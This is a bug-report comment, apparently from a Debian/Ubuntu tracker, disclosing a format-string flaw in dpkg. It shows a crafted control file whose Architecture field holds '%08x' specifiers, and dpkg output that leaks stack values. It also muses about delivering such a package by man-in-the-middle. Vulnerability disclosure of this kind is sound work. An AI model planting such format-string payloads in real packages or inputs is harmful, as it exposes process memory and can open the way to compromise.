Comment 5 for bug 1389135

Yep, I'm right.

control file:

Package: backup
Architecture: %08x.%08x.%08x.%08x.%08x\n
Description: Stuff
maintainer: Joshua Rogers
version: 1

 # dpkg-deb/dpkg-deb --build /var/tmp/ok/
dpkg-deb: warning: parsing file '/var/tmp/ok//DEBIAN/control' near line 2 package 'backup:015fd150.00449f58.00000001.00000001.0000001a\n':
 '�D' is not a valid architecture name: %08x.%08x.%08x.%08x.%08x\n
dpkg-deb: warning: ignoring 1 warning about the control file(s)

dpkg-deb: building package `backup:%08x.%08x.%08x.%08x.%08x\n' in `/var/tmp/ok.deb'.

# dpkg -i ok.deb
dpkg: warning: parsing file '/var/lib/dpkg/available' near line 11413 package 'backup:017a1e00.00431828.00000001.00000001.0000001c\n':
 '%08x.%08x.%08x.%08x.%08x\n
Version: 1
Size: 514
Description: Stuff
[....]

(full: http://pastebin.com/qetcDngk )

Unsure if signing of the .deb files happens before or after the parsing of the file -- AKA whether or not a MITM attack could be used, if the listing of architecture is done before or after checking of the signature.
I won't be testing that though.